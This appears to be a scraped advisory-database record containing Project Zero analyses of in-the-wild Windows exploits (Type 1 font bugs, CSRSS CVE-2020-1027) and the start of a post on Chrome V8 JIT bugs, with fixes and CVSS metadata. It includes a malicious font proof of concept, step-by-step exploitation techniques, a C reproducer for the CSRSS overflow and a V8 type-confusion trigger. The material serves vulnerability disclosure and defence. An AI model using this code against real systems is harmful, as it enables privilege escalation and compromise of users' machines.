begin\n\n/FullName (Test) def\n\nend\n\n/FontType 1 def\n\n/FontMatrix [0.001 0 0 0.001 0 0] def\n\n/BlendDesignPositions [[][][][][][][][][][][][][][][][][][][][][][][0 0 0 0 16705.25490 -0.00001]]\n\n/Private begin\n\n/Blend begin\n\n/end\n\nend\n\ncurrentdict end\n\n%currentfile eexec /Private begin\n\n/CharStrings 1 begin\n\n/.notdef ## -| { endchar } |-\n\nend\n\nend\n\nmark %currentfile closefile\n\ncleartomark \n \n--- \n \nIn the highlighted line, we first specify 22 empty arrays that don't corrupt any memory and only shift the index up to &values[22]. Then, we write the 32-bit values of 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x41414141, 0xfffffff to values[22][0..5]. On a vulnerable Windows 8.1, this coincides with the position of an unprotected return address higher on the stack. When such a font is loaded through GDI, the following kernel bugcheck is generated:\n\nPAGE_FAULT_IN_NONPAGED_AREA (50)\n\nInvalid system memory was referenced. This cannot be protected by try-except.\n\nTypically the address is just plain bad or it is pointing at freed memory.\n\nArguments:\n\nArg1: ffffffff41414141, memory referenced.\n\nArg2: 0000000000000008, value 0 = read operation, 1 = write operation.\n\nArg3: ffffffff41414141, If non-zero, the instruction address which referenced the bad memory\n\naddress.\n\nArg4: 0000000000000002, (reserved)\n\n[...]\n\nTRAP_FRAME: ffffd0003e7ca140 -- (.trap 0xffffd0003e7ca140)\n\nNOTE: The trap frame does not contain all registers.\n\nSome register values may be zeroed or incorrect.\n\nrax=0000000000000000 rbx=0000000000000000 rcx=aae4a99ec7250000\n\nrdx=0000000000000027 rsi=0000000000000000 rdi=0000000000000000\n\nrip=ffffffff41414141 rsp=ffffd0003e7ca2d0 rbp=0000000000000002\n\nr8=0000000000000618 r9=0000000000000024 r10=fffff90000002000\n\nr11=ffffd0003e7ca270 r12=0000000000000000 r13=0000000000000000\n\nr14=0000000000000000 r15=0000000000000000\n\niopl=0 nv up ei ng nz na po nc\n\nffffffff`41414141 ?? ???\n\nResetting default scope \n \n--- \n \n### Exploitation\n\nAccording to our analysis, the font exploit supported the following Windows versions:\n\n * Windows 8.1 (NT 6.3)\n * Windows 8 (NT 6.2)\n * Windows 7 (NT 6.1)\n * Windows Vista (NT 6.0)\n\nWhen run on systems up to and including Windows 8, the exploit started off by triggering the write-what-where condition (bug #1) twice, to set up a minimalistic 8-byte bootstrap code at a fixed address around 0xfffff90000000000. This location corresponds to the win32k.sys session space, and is mapped as RWX in these old versions of Windows, which means that KASLR didn't have to be bypassed as part of the attack. As the next step, the exploit used bug #2 to redirect execution to the first stage payload. Each of these actions was performed through a single NtGdiAddRemoteFontToDC system call, which can conveniently load Type 1 fonts from memory (as previously discussed [here](<https://googleprojectzero.blogspot.com/2015/08/one-font-vulnerability-to-rule-them-all_13.html>)), and was enough to reach both vulnerabilities. In total, the privilege escalation process took only three syscalls.\n\nThings get more complicated on Windows 8.1, where the session space is no longer executable:\n\n0: kd> !pte fffff90000000000\n\nPXE at FFFFF6FB7DBEDF90 \n\ncontains 0000000115879863 \n\npfn 115879 ---DA--KWEV \n\nPPE at FFFFF6FB7DBF2000\n\ncontains 0000000115878863\n\npfn 115878 ---DA--KWEV\n\nPDE at FFFFF6FB7E400000\n\ncontains 0000000115877863\n\npfn 115877 ---DA--KWEV\n\nPTE at FFFFF6FC80000000\n\ncontains 8000000115976863\n\npfn 115976 ---DA--KW-V \n \n--- \n \nAs a result, the memory cannot be used so trivially as a staging area for the controlled kernel-mode code, but with a write-what-where primitive, there are many ways to work around it. In this specific exploit, the author switched from the session space to another page with a constant address \u2013 the [shared user data](<https://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kuser_shared_data/index.htm>) region at 0xfffff78000000000. Notably, that page is not executable by default either, but thanks to the fixed location of page tables in Windows 8.1, it can be made executable with a single 32-bit write of value 0x0 to address 0xfffff6fbc0000004, which stores the relevant page table entry. This is what the exploit did \u2013 it disabled the NX bit in PTE, then wrote a 192-byte payload to the shared user page and executed it. This code path also performed some extra clean up, first by restoring the NX bit and then erasing traces of the attack from memory.\n\nOnce kernel execution reached the initial shellcode, a series of intermediary steps followed, each of them unpacking and jumping to a next, longer stage. Some code was encoded in the /FontMatrix PostScript object, some in the /FontBBox object, and even more directly in the font stream data. At this point, the exploit resolved the addresses of several exported symbols in ntoskrnl.exe, allocated RWX memory with a ExAllocatePoolWithTag(NonPagedPool) call, copied the final payload from the user-mode address space, and executed it. This is where we'll conclude our analysis, as the mechanics of the ring-0 shellcode are beyond the scope of this post.\n\n### The fixes\n\nWe reported the issues to Microsoft on March 17. Initially, they were subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. A [security advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006>) was published by Microsoft on March 23, urging users to apply workarounds such as disabling the atmfd.dll font driver to mitigate the vulnerabilities. The fixes came out on April 14 as part of that month's Patch Tuesday, 28 days after our report.\n\nSince both bugs were simple in nature, their fixes were equally simple too. In the ParseBlendVToHOrigin function, both ptrs and values arrays were extended to 16 entries, and an extra sanity check was added to ensure that numMasters wouldn't exceed 16:\n\nint ParseBlendVToHOrigin(void *arg) {\n\nFixed16_16 *ptrs[16];\n\nFixed16_16 values[16];\n\nif (g_font->numMasters > 0x10) {\n\nreturn -4;\n\n}\n\n[...]\n\n} \n \n--- \n \nIn the SetBlendDesignPositions function, an extra bounds check was introduced to limit the number of loop iterations to 16:\n\nint SetBlendDesignPositions(void *arg) {\n\nint num_master;\n\nFixed16_16 values[16][15];\n\nfor (num_master = 0; ; num_master++) {\n\nif (GetToken() != TOKEN_OPEN) {\n\nbreak;\n\n}\n\nif (num_master >= 16) {\n\nreturn -4;\n\n}\n\nint values_read = GetOpenFixedArray(&values[num_master], 15);\n\nSetNumAxes(values_read);\n\n}\n\n[...]\n\n} \n \n--- \n \n## 2\\. CSRSS issue on Windows 10 (CVE-2020-1027)\n\n### Background\n\nThe Client/Server Runtime Subsystem, or csrss.exe, is the user-mode part of the Win32 subsystem. Before Windows NT 4.0, CSRSS was in charge of the entire graphical user interface; nowadays, it implements tasks related to, for example, process and thread management.\n\ncsrss.exe is a user-mode process that runs with SYSTEM privileges. By default, every Win32 application opens a connection to CSRSS at startup. A significant number of API functions in Windows rely on the existence of the connection, so even the most restrictive application sandboxes, including the Chromium sandbox, can\u2019t lock it down without causing stability problems. This makes CSRSS an appealing vector for privilege escalation attacks.\n\nThe communication with the subsystem server is performed via the ALPC mechanism, and the OS provides the high-level CSR API on top of it. The primary API function is called ntdll!CsrClientCallServer. It invokes a selected CSRSS routine and (optionally) receives the result:\n\nNTSTATUS CsrClientCallServer(\n\nPCSR_API_MSG ApiMessage,\n\nPVOID CaptureBuffer,\n\nULONG ApiNumber,\n\nLONG DataLength); \n \n--- \n \nThe ApiNumber parameter determines which routine will be executed. ApiMessage is a pointer to a corresponding message object of size DataLength, and CaptureBuffer is a pointer to a buffer in a special shared memory region created during the connection initialization. CSRSS employs shared memory to transfer large and/or dynamically-sized structures, such as strings. ApiMessage can contain pointers to objects inside CaptureBuffer, and the API takes care of translating the pointers between the client and server virtual address spaces.\n\nThe reader can refer to [this series of posts](<https://j00ru.vexillium.org/2010/07/windows-csrss-write-up-the-basics/>) for a detailed description of the CSRSS internals.\n\nOne of CSRSS modules, sxssrv.dll, implements the support for side-by-side assemblies. Side-by-side assembly (SxS) technology is a standard for executable files that is primarily aimed at alleviating problems, such as version conflicts, arising from the use of dynamic-link libraries. In SxS, Windows stores multiple versions of a DLL and loads them on demand. An application can include a side-by-side manifest, i.e. a special XML document, to specify its exact dependencies. An example of an application manifest is provided below:\n\n<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\n\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\n\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.MySampleApp\"\n\nversion=\"1.0.0.0\" processorArchitecture=\"x86\"/>\n\n<dependency>\n\n<dependentAssembly>\n\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Tools.MyPrivateDll\"\n\nversion=\"2.5.0.0\" processorArchitecture=\"x86\"/>\n\n</dependentAssembly>\n\n</dependency>\n\n</assembly> \n \n--- \n \n### The bug\n\nThe vulnerability in question has been discovered in the routine sxssrv! BaseSrvSxsCreateActivationContext, which has the API number 0x10017. The function parses an application manifest and all its (potentially transitive) dependencies into a binary data structure called an activation context, and the current activation context determines the objects and libraries that need to be redirected to a specific implementation.\n\nThe relevant ApiMessage object contains several UNICODE_STRING parameters, such as the application name and assembly store path. UNICODE_STRING is a well-known mutable string structure with a separate field to keep the capacity (MaximumLength) of the backing store:\n\ntypedef struct _UNICODE_STRING {\n\nUSHORT Length;\n\nUSHORT MaximumLength;\n\nPWSTR Buffer;\n\n} UNICODE_STRING, *PUNICODE_STRING; \n \n--- \n \nBaseSrvSxsCreateActivationContext starts with validating the string parameters:\n\nfor (i = 0; i < 6; ++i) {\n\nif (StringField = StringFields[i]) {\n\nLength = StringField->Length;\n\nif (Length && !StringField->Buffer ||\n\nLength > StringField->MaximumLength || Length & 1)\n\nreturn 0xC000000D;\n\nif (StringField->Buffer) {\n\nif (!CsrValidateMessageBuffer(ApiMessage, &StringField->Buffer,\n\nLength + 2, 1)) {\n\nDbgPrintEx(0x33, 0,\n\n\"SXS: Validation of message buffer 0x%lx failed.\\n\"\n\n\" Message:%p\\n\"\n\n\" String %p{Length:0x%x, MaximumLength:0x%x, Buffer:%p}\\n\",\n\ni, ApiMessage, StringField, StringField->Length,\n\nStringField->MaximumLength, StringField->Buffer);\n\nreturn 0xC000000D;\n\n}\n\nCharCount = StringField->Length >> 1;\n\nif (StringField->Buffer[CharCount] &&\n\nStringField->Buffer[CharCount - 1])\n\nreturn 0xC000000D;\n\n}\n\n}\n\n} \n \n--- \n \nCsrValidateMessageBuffer is declared as follows:\n\nBOOLEAN CsrValidateMessageBuffer(\n\nPCSR_API_MSG ApiMessage,\n\nPVOID* Buffer,\n\nULONG ElementCount,\n\nULONG ElementSize); \n \n--- \n \nThis function verifies that 1) the *Buffer pointer references data inside the associated capture buffer, 2) the expression *Buffer + ElementCount * ElementSize doesn\u2019t cause an integer overflow, and 3) it doesn\u2019t go past the end of the capture buffer.\n\nAs the reader can see, the buffer size for the validation is calculated based on the Length field rather than MaximumLength. This would be safe if the strings were only used as input parameters. Unfortunately, the string at offset 0x120 from the beginning of ApiMessage (we\u2019ll be calling it ApplicationName) can also be re-used as an output parameter. The affected call stack looks as follows:\n\nsxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity\n\nsxs!CNodeFactory::CreateNode\n\nsxs!XMLParser::Run\n\nsxs!SxspIncorporateAssembly\n\nsxs!SxspCloseManifestGraph\n\nsxs!SxsGenerateActivationContext\n\nsxssrv!BaseSrvSxsCreateActivationContextFromStructEx\n\nsxssrv!BaseSrvSxsCreateActivationContext\n\nWhen BaseSrvSxsCreateActivationContextFromStructEx is called, it initializes an instance of the SXS_GENERATE_ACTIVATION_CONTEXT_PARAMETERS structure with the pointer to ApplicationName\u2019s buffer and the unaudited MaximumLength value as the buffer size:\n\nBufferCapacity = CreateCtxParams->ApplicationName.MaximumLength;\n\nif (BufferCapacity) {\n\nGenActCtxParams.ApplicationNameCapacity = BufferCapacity >> 1;\n\nGenActCtxParams.ApplicationNameBuffer =\n\nCreateCtxParams->ApplicationName.Buffer;\n\n} else {\n\nGenActCtxParams.ApplicationNameCapacity = 60;\n\nStringBuffer = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, 120);\n\nif (!StringBuffer) {\n\nStatus = 0xC0000017;\n\ngoto error;\n\n}\n\nGenActCtxParams.ApplicationNameBuffer = StringBuffer;\n\n} \n \n--- \n \nThen sxs!SxsGenerateActivationContext passes those values to ACTCTXGENCTX:\n\nContext = (_ACTCTXGENCTX *)HeapAlloc(g_hHeap, 0, 0x10D8);\n\nif (Context) {\n\nContext = _ACTCTXGENCTX::_ACTCTXGENCTX(Context);\n\n} else {\n\nFusionpTraceAllocFailure(v14);\n\nSetLastError(0xE);\n\ngoto error;\n\n}\n\nif (GenActCtxParams->ApplicationNameBuffer &&\n\nGenActCtxParams->ApplicationNameCapacity) {\n\nContext->ApplicationNameBuffer = GenActCtxParams->ApplicationNameBuffer;\n\nContext->ApplicationNameCapacity = GenActCtxParams->ApplicationNameCapacity;\n\n} \n \n--- \n \nUltimately, sxs!CNodeFactory::\n\nXMLParser_Element_doc_assembly_assemblyIdentity calls memcpy that can go past the end of the capture buffer:\n\nIdentityNameBuffer = 0;\n\nIdentityNameLength = 0;\n\nSetLastError(0);\n\nif (!SxspGetAssemblyIdentityAttributeValue(0, v11, &s_IdentityAttribute_name,\n\n&IdentityNameBuffer,\n\n&IdentityNameLength)) {\n\nCallSiteInfo = off_16506FA20;\n\ngoto error;\n\n}\n\nif (IdentityNameLength &&\n\nIdentityNameLength < Context->ApplicationNameCapacity) {\n\nmemcpy(Context->ApplicationNameBuffer, IdentityNameBuffer,\n\n2 * IdentityNameLength + 2);\n\nContext->ApplicationNameLength = IdentityNameLength;\n\n} else {\n\n*Context->ApplicationNameBuffer = 0;\n\nContext->ApplicationNameLength = 0;\n\n} \n \n--- \n \nThe source data for the memcpy call comes from the name parameter of the main assemblyIdentity node in the manifest.\n\n### Exploitation\n\nEven though the vulnerability was present in older versions of Windows, the exploit only targets Windows 10. All major builds up to 18363 are supported.\n\nAs a result of the vulnerability, the attacker can call memcpy with fully controlled contents and size. This is one of the best initial primitives a memory corruption bug can provide, but there\u2019s one potential issue. So far it seems like the bug allows the attacker to write data either past the end of the capture buffer in a shared memory region, which they can already write to from the sandboxed process, or past the end of the shared region, in which case it\u2019s quite difficult to reliably make a \u201cuseful\u201d allocation right next to the region. Luckily for the attacker, the vulnerable code actually operates on a copy of the original capture buffer, which is made by csrsrv!CsrCaptureArguments to avoid potential issues caused by concurrent modification of the buffer contents, and the copy is allocated in the regular heap.\n\nThe logical first step of the exploit would be to leak some data needed for an ASLR bypass. However, the following design quirks in Windows and CSRSS make it unnecessary:\n\n * Windows randomizes module addresses once per boot, and csrss.exe is a regular user-mode process. This means that the attacker can use modules loaded in both csrss.exe and the compromised sandboxed process, for example, ntdll.dll, for code-reuse attacks.\n\n * csrss.exe provides client processes with its virtual address of the shared region during initialization so they can adjust pointers for API calls. The offset between the \u201clocal\u201d and \u201cremote\u201d addresses is stored in ntdll!CsrPortMemoryRemoteDelta. Thus, the attacker can store, e.g., fake structures needed for the attack in the shared mapping at a predictable address.\n\nThe exploit also has to bypass another security feature, Microsoft\u2019s Control Flow Guard, which makes it significantly more difficult to jump into a code reuse gadget chain via an indirect function call. The attacker has decided to exploit the CFG\u2019s inability to protect return addresses on the stack to gain control of the instruction pointer. The complete algorithm looks as follows:\n\n1\\. Groom the heap. The exploit makes a preliminary CreateActivationContext call with a specially crafted manifest needed to massage the heap into a predictable state. It contains an XML node with numerous attributes in the form aa:aabN=\"BB...BB\u201d. The manifest for the second call, which actually triggers the vulnerability, contains similar but different-sized attributes.\n\n2\\. Implement write-what-where. The buffer overflow is used to overwrite the contents of XMLParser::_MY_XML_NODE_INFO nodes. _MY_XML_NODE_INFO may optionally contain a pointer to an internal character buffer. During subsequent parsing, if the current element is a numeric character entity (i.e. a string in the form &#x01234;), the parser calls XMLParser::CopyText to store the decoded character in the internal buffer of the currently active _MY_XML_NODE_INFO node. Therefore, by overwriting multiple nodes, the exploit can write data of any size to a controlled address.\n\n3\\. Overwrite the loaded module list. The primitive gained in the previous step is used to modify the pointer to the loaded module list located in the PEB_LDR_DATA structure inside ntdll.dll, which is possible because the attacker has already obtained the base address of the library from the sandboxed process. The fake module list consists of numerous LDR_MODULE entries and is stored in the shared memory region. The unofficial definition of the structure is shown below:\n\ntypedef struct _LDR_MODULE {\n\nLIST_ENTRY InLoadOrderModuleList;\n\nLIST_ENTRY InMemoryOrderModuleList;\n\nLIST_ENTRY InInitializationOrderModuleList;\n\nPVOID BaseAddress;\n\nPVOID EntryPoint;\n\nULONG SizeOfImage;\n\nUNICODE_STRING FullDllName;\n\nUNICODE_STRING BaseDllName;\n\nULONG Flags;\n\nSHORT LoadCount;\n\nSHORT TlsIndex;\n\nLIST_ENTRY HashTableEntry;\n\nULONG TimeDateStamp;\n\n} LDR_MODULE, *PLDR_MODULE; \n \n--- \n \nWhen a new thread is created, the ntdll!LdrpInitializeThread function will follow the module list and, provided that the necessary flags are set, run the function referenced by the EntryPoint member with BaseAddress as the first argument. The EntryPoint call is still protected by the CFG, so the exploit can\u2019t jump to a ROP chain yet. However, this gives the attacker the ability to execute an arbitrary sequence of one-argument function calls.\n\n4\\. Launch a new thread. The exploit deliberately causes a null pointer dereference. The exception handler in csrss.exe catches it and creates an error-reporting task in a new thread via csrsrv!CsrReportToWerSvc.\n\n5\\. Restore the module list. Once the execution reaches the fake module list processing, it\u2019s important to restore PEB_LDR_DATA\u2019s original state to avoid crashes in other threads. The attacker has discovered that a pair of ntdll!RtlPopFrame and ntdll!RtlPushFrame calls can be used to copy an 8-byte value from one given address to another. The fake module list starts with such a pair to fix the loader data structure.\n\n6\\. Leak the stack register. In this step the exploit takes full advantage of the shared memory region. First, it calls setjmp to leak the register state into the shared region. The next module entry points to itself, so the execution enters an infinite loop of NtYieldExecution calls. In the meantime, the sandboxed process detects that the data in the setjmp buffer has been modified. It calculates the return address location for the LdrpInitializeThread stack frame, sets it as the destination address for a subsequent copy operation, and modifies the InLoadOrderModuleList pointer of the current module entry, thus breaking the loop.\n\n7\\. Overwrite the return address. After the exploit exits the loop in csrss.exe, it performs two more copy operations: overwrites the return address with a stack pivot pointer, and puts the fake stack address next to it. Then, when LdrpInitializeThread returns, the execution continues in the ROP chain.\n\n8\\. Transition to winlogon.exe. The ROP payload creates a new memory section and shares it with both winlogon.exe, which is another highly-privileged Windows process, and the sandboxed process. Then it creates a new thread in winlogon.exe using an address inside the section as the entry point. The sandboxed process writes the final stage of the exploit to the section, which downloads and executes an implant. The rest of the ROP payload is needed to restore the normal state of csrss.exe and terminate the error reporting thread.\n\n### The fix\n\nWe reported the issue to Microsoft on March 23. Similarly to the font bugs, it was subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. The fix came out 22 days after our report.\n\nThe patch renamed BaseSrvSxsCreateActivationContext into BaseSrvSxsCreateActivationContextFromMessage and added an extra CsrValidateMessageBuffer call for the ApplicationName field, this time with MaximumLength as the size argument:\n\nApplicationName = ApiMessage->CreateActivationContext.ApplicationName;\n\nif (ApplicationName.MaximumLength &&\n\n!CsrValidateMessageBuffer(ApiMessage, &ApplicationName.Buffer,\n\nApplicationName.MaximumLength, 1)) {\n\nSavedMaximumLength = ApplicationName.MaximumLength;\n\nApplicationName.MaximumLength = ApplicationName.Length + 2;\n\n}\n\n[...]\n\nif (SavedMaximumLength)\n\nApiMessage->CreateActivationContext.ApplicationName.MaximumLength =\n\nSavedMaximumLength;\n\nreturn result; \n \n--- \n \n### Appendix A\n\nThe following reproducer has been tested on Windows 10.0.18363.959.\n\n#include <stdint.h>\n\n#include <stdio.h>\n\n#include <windows.h>\n\n#include <string>\n\nconst char* MANIFEST_CONTENTS =\n\n\"<?xml version='1.0' encoding='UTF-8' standalone='yes'?>\"\n\n\"<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>\"\n\n\"<assemblyIdentity name='@' version='1.0.0.0' type='win32' \"\n\n\"processorArchitecture='amd64'/>\"\n\n\"</assembly>\";\n\nconst WCHAR* NULL_BYTE_STR = L\"\\x00\\x00\";\n\nconst WCHAR* MANIFEST_NAME =\n\nL\"msil_system.data.sqlxml.resources_b77a5c561934e061_3.0.4100.17061_en-us_\"\n\nL\"d761caeca23d64a2.manifest\";\n\nconst WCHAR* PATH = L\"\\\\\\\\\\\\\\\\.\\\\\\c:Windows\\\\\\\";\n\nconst WCHAR* MODULE = L\"System.Data.SqlXml.Resources\";\n\ntypedef PVOID(__stdcall* f_CsrAllocateCaptureBuffer)(ULONG ArgumentCount,\n\nULONG BufferSize);\n\nf_CsrAllocateCaptureBuffer CsrAllocateCaptureBuffer;\n\ntypedef NTSTATUS(__stdcall* f_CsrClientCallServer)(PVOID ApiMessage,\n\nPVOID CaptureBuffer,\n\nULONG ApiNumber,\n\nULONG DataLength);\n\nf_CsrClientCallServer CsrClientCallServer;\n\ntypedef NTSTATUS(__stdcall* f_CsrCaptureMessageString)(LPVOID CaptureBuffer,\n\nPCSTR String,\n\nULONG Length,\n\nULONG MaximumLength,\n\nPSTR OutputString);\n\nf_CsrCaptureMessageString CsrCaptureMessageString;\n\nNTSTATUS CaptureUnicodeString(LPVOID CaptureBuffer, PSTR OutputString,\n\nPCWSTR String, ULONG Length = 0) {\n\nif (Length == 0) {\n\nLength = lstrlenW(String);\n\n}\n\nreturn CsrCaptureMessageString(CaptureBuffer, (PCSTR)String, Length * 2,\n\nLength * 2 + 2, OutputString);\n\n}\n\nint main() {\n\nHMODULE Ntdll = LoadLibrary(L\"Ntdll.dll\");\n\nCsrAllocateCaptureBuffer = (f_CsrAllocateCaptureBuffer)GetProcAddress(\n\nNtdll, \"CsrAllocateCaptureBuffer\");\n\nCsrClientCallServer =\n\n(f_CsrClientCallServer)GetProcAddress(Ntdll, \"CsrClientCallServer\");\n\nCsrCaptureMessageString = (f_CsrCaptureMessageString)GetProcAddress(\n\nNtdll, \"CsrCaptureMessageString\");\n\nchar Message[0x220];\n\nmemset(Message, 0, 0x220);\n\nPVOID CaptureBuffer = CsrAllocateCaptureBuffer(4, 0x300);\n\nstd::string Manifest = MANIFEST_CONTENTS;\n\nManifest.replace(Manifest.find('@'), 1, 0x2000, 'A');\n\n// There's no public definition of the relevant CSR_API_MSG structure.\n\n// The offsets and values are taken directly from the exploit.\n\n*(uint32_t*)(Message + 0x40) = 0xc1;\n\n*(uint16_t*)(Message + 0x44) = 9;\n\n*(uint16_t*)(Message + 0x59) = 0x201;\n\n// CSRSS loads the manifest contents from the client process memory;\n\n// therefore, it doesn't have to be stored in the capture buffer.\n\n*(const char**)(Message + 0x80) = Manifest.c_str();\n\n*(uint64_t*)(Message + 0x88) = Manifest.size();\n\n*(uint64_t*)(Message + 0xf0) = 1;\n\nCaptureUnicodeString(CaptureBuffer, Message + 0x48, NULL_BYTE_STR, 2);\n\nCaptureUnicodeString(CaptureBuffer, Message + 0x60, MANIFEST_NAME);\n\nCaptureUnicodeString(CaptureBuffer, Message + 0xc8, PATH);\n\nCaptureUnicodeString(CaptureBuffer, Message + 0x120, MODULE);\n\n// Triggers the issue by setting ApplicationName.MaxLength to a large value.\n\n*(uint16_t*)(Message + 0x122) = 0x8000;\n\nCsrClientCallServer(Message, CaptureBuffer, 0x10017, 0xf0);\n\n} \n \n--- \n \nThis is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the [introduction post](<https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "googleprojectzero", "title": "\nIn-the-Wild Series: Windows Exploits\n", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0938", "CVE-2020-1020", "CVE-2020-1027"], "modified": "2021-01-12T00:00:00", "id": "GOOGLEPROJECTZERO:C4CBD27E9FA33882CD77C7DAC1496DD3", "href": "https://googleprojectzero.blogspot.com/2021/01/in-wild-series-windows-exploits.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-25T01:57:26", "description": "This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the [introduction post](<https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html>).\n\nPosted by Sergei Glazunov, Project Zero\n\n### Introduction\n\nAs we continue the series on the watering hole attack discovered in early 2020, in this post we\u2019ll look at the rest of the exploits used by the actor against Chrome. A timeline chart depicting the extracted exploits and affected browser versions is provided below. Different color shades represent different exploit versions.\n\n[![A timeline chart depicting the extracted exploits and affected browser versions.](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEMUw-YTpTvkjcUeKpLYcW6LPJUa4iJZkrxyjjB5LI7D9A_mLEY5hH6E8YQkEiCfTiigo_L00kGyOkIHJHS6rEsx-p5cRRHhvKtPWMhw4b1f9y0d6RE2sIQWvZAo_k8LpUvoF1VZePHcIQoTWaxeGC82ORwHQbMWIifLTvN0NYUu7XYdTKe5ndTIq9/s1359/timeline.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEMUw-YTpTvkjcUeKpLYcW6LPJUa4iJZkrxyjjB5LI7D9A_mLEY5hH6E8YQkEiCfTiigo_L00kGyOkIHJHS6rEsx-p5cRRHhvKtPWMhw4b1f9y0d6RE2sIQWvZAo_k8LpUvoF1VZePHcIQoTWaxeGC82ORwHQbMWIifLTvN0NYUu7XYdTKe5ndTIq9/s1359/timeline.png>)\n\nAll vulnerabilities used by the attacker are in V8, Chrome\u2019s JavaScript engine; and more specifically, they are JIT compiler bugs. While classic C++ memory safety issues are still [exploited in real-world attacks](<https://securelist.com/the-zero-day-exploits-of-operation-wizardopium/97086/>) against web browsers, vulnerabilities in JIT offer many advantages to attackers. First, they usually provide more powerful primitives that can be easily turned into a reliable exploit without the need of a separate issue to, for example, break ASLR. Secondly, the majority of them are almost interchangeable, which significantly accelerates exploit development. Finally, bugs from this class allow the attacker to take advantage of a browser feature called web workers. Web developers use workers to execute additional tasks in a separate JavaScript environment. The fact that every worker runs in its own thread and has its own V8 heap makes exploitation significantly more predictable and stable.\n\nThe bugs themselves aren\u2019t novel. In fact, three out of four issues have been independently discovered by external security researchers and reported to Chrome, and two of the reports even provided a full renderer exploit. While writing this post, we were more interested in learning about exploitation techniques and getting insight into a high-tier attacker\u2019s exploit development process.\n\n### 1\\. CVE-2017-5070\n\n#### The vulnerability\n\nThis is an issue in Crankshaft, the JIT engine Chrome used before TurboFan. The alias analyzer, which is used by several optimization passes to determine whether two nodes may refer to the same object, produces incorrect results when one of the two nodes is a constant. Consider the following code, which has been extracted from one of the exploits:\n\nglobal_array = [, 1.1];\n\nfunction trigger(local_array) {\n\nvar temp = global_array[0];\n\nlocal_array[1] = {};\n\nreturn global_array[1];\n\n}\n\ntrigger([, {}]);\n\ntrigger([, 1.1]);\n\nfor (var i = 0; i < 10000; i++) {\n\ntrigger([, {}]);\n\n}\n\nprint(trigger(global_array)); \n \n--- \n \nThe first line of the trigger function makes Crankshaft perform a map check on global_array (a map in V8 describes the \u201cshape\u201d of an object and includes the element representation information). The next line may trigger the double -> tagged element representation transition for local_array. Since the compiler incorrectly assumes that local_array and global_array can\u2019t point to the same object, it doesn\u2019t invalidate the recorded map state of global_array and, consequently, eliminates the \u201credundant\u201d map check in the last line of the function.\n\nThe vulnerability grants an attacker a two-way type confusion between a JS object pointer and an unboxed double, which is a powerful primitive and is sufficient for a reliable exploit.\n\nThe issue was [reported to Chrome](<https://bugs.chromium.org/p/chromium/issues/detail?id=722756>) by security researcher Qixun Zhao (@S0rryMybad) in May 2017 and fixed in the initial release of Chrome 59. The researcher also provided a renderer exploit. [The fix](<https://chromium.googlesource.com/v8/v8.git/+/e33fd30777f99a0d6e16b16d096a2663b1031457>) made made the alias analyser use the constant comparison only when both arguments are constants:\n\nHAliasing Query(HValue* a, HValue* b) {\n\n[...]\n\n// Constant objects can be distinguished statically.\n\n- if (a->IsConstant()) {\n\n+ if (a->IsConstant() && b->IsConstant()) {\n\nreturn a->Equals(b) ? kMustAlias : kNoAlias;\n\n}\n\nreturn kMayAlias; \n \n--- \n \n#### Exploit 1\n\nThe earliest exploit we\u2019ve discovered targets Chrome 37-58. This is the widest version range we\u2019ve seen, which covers the period of almost three years. Unlike the rest of the exploits, this one contains a separate constant table for every supported browser build.\n\nThe author of the exploit takes a [known approach](<http://phrack.org/papers/attacking_javascript_engines.html>) to exploiting type confusions in JavaScript engines, which involves gaining the arbitrary read/write capability as an intermediate step. The exploit employs the issue to implement the addrof and fakeobj primitives. It \u201cconstructs\u201d a fake ArrayBuffer object inside a JavaScript string, and uses the above primitives to obtain a reference to the fake object. Because strings in JS are immutable, the backing store pointer field of the fake ArrayBuffer can\u2019t be modified. Instead, it\u2019s set in advance to point to an extra ArrayBuffer, which is actually used for arbitrary memory access. Finally, the exploit follows a pointer chain to locate and overwrite the code of a JIT compiled function, which is stored in a RWX memory region.\n\nThe exploit is quite an impressive piece of engineering. For example, it includes a small framework for crafting fake JS objects, which supports assigning fields to real JS objects, 